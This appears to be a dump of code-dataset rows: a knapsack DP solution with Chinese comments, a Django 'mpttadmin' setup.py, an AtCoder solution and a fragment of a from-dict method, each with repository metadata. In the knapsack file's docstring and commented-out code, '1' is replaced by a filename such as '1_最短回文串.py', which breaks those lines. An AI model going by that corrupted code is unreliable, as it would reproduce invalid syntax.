if 'tenant' in d:
o.tenant = d['tenant']
if 'valid_end_date' in d:
o.valid_end_date = d['valid_end_date']
if 'valid_start_date' in d:
o.valid_start_date = d['valid_start_date']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
9becd149112233943b28b41f338400549756c333 | d3720c1848fb69a05121fcd378a12a6d1921f303 | /4_LEETCODE/2_DP/背包问题/2_完全背包.py | 35b58da0a6cc62245ebacf6c4ba97c14a70f2b33 | [] | no_license | fzingithub/SwordRefers2Offer | 32a44e87c178bafc554108f1d1e479e18b0ee028 | 57f303aa6e76f7c5292fa60bffdfddcb4ff9ddfb | refs/heads/master | 2023-04-08T09:35:02.082121 | 2023-03-28T00:06:00 | 2023-03-28T00:06:00 | 219,700,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | '''
f[i][j] 前i个物品,体积为j的背包,理论上的最大价值。
f[0][0] = 0
res = max{f[N]}
f[i][j] = max{f[i-1_最短回文串.py][j], f[i-1_最短回文串.py][j-k*v[i]] + k*w[i]}
'''
N, V = map(int, input().split())
v = [0] * (N + 1)
w = [0] * (N + 1)
for i in range(1, N + 1):
v[i], w[i] = map(int, input().split())
# print(N,V)
# print(v,w)
# f = [[0 for i in range(V+1_最短回文串.py)] for i in range(N+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V + 1_最短回文串.py):
# f[i][j] = f[i - 1_最短回文串.py][j]
# for k in range(1_最短回文串.py, j // v[i] + 1_最短回文串.py):
# f[i][j] = max(f[i][j], f[i - 1_最短回文串.py][j - k * v[i]] + k * w[i])
#
# print(f[N][V])
# # #优化 二维数组为一维数组
# f = [0 for i in range(V+1_最短回文串.py)] # 初始化全0
#
# for i in range(1_最短回文串.py, N + 1_最短回文串.py):
# for j in range(V, v[i]-1_最短回文串.py, -1_最短回文串.py):
# for k in range(0, j // v[i] + 1_最短回文串.py):
# f[j] = max(f[j], f[j - k * v[i]] + k * w[i])
#
# print(f[V])
#优化 取消k
f = [0 for i in range(V+1)] # 初始化全0
for i in range(1, N + 1):
for j in range(v[i], V+1):
f[j] = max(f[j], f[j-v[i]] + w[i])
print(f[V]) | [
"35060424+fzingithub@users.noreply.github.com"
] | 35060424+fzingithub@users.noreply.github.com |
5e45adf16188acbf28a383b77c22d5cfe2685e61 | 0f0fa5a3086649a32ede3722ca14b598948f35e0 | /setup.py | 551e361538f8b43b270ed51115caee7d37d43ba1 | [] | no_license | marazmiki/django-mptt-admin | cf6b3648e3898233f99e2c2861f8254f61307e1a | 125908b87066e957051f36fed6d60a3088f12cdb | refs/heads/master | 2021-01-22T00:51:21.576551 | 2011-10-11T17:53:54 | 2011-10-11T17:53:54 | 2,557,013 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name = 'mpttadmin',
version = '0.3.1',
author = 'Mikhail Sakhno',
author_email = 'pawn13@gmail.com',
description = """jstree admin for mptt models""",
license = "BSD",
keywords = "django admin",
platforms = "POSIX",
url = 'http://code.tabed.org/mptt_admin',
install_requires=['django'],
packages=['mpttadmin'],#find_packages(),
package_data = { 'mpttadmin': [
'media/js/*.js',
'media/js/lib/*.js',
'media/js/lib/plugins/*.js',
'media/js/lib/themes/*/*',
]},
include_package_data=True,
classifiers=[
"Framework :: Django",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Topic :: Software Development"
],
)
| [
"marazmiki@gmail.com"
] | marazmiki@gmail.com |
d784039fbf29070d60585c62c411d71fd3bbbec9 | 943dca755b940493a8452223cfe5daa2fb4908eb | /abc303/a.py | 252013eff15c913bcc6984509b0f36ea3d48e9cc | [] | no_license | ymsk-sky/atcoder | 5e34556582763b7095a5f3a7bae18cbe5b2696b2 | 36d7841b70b521bee853cdd6d670f8e283d83e8d | refs/heads/master | 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | n = int(input())
s = input()
t = input()
for i in range(n):
if s[i] == t[i]:
continue
if (s[i] in "l1") and (t[i] in "l1"):
continue
if (s[i] in "o0") and (t[i] in "o0"):
continue
print("No")
exit()
print("Yes")
| [
"ymsk.sky.95@gmail.com"
] | ymsk.sky.95@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.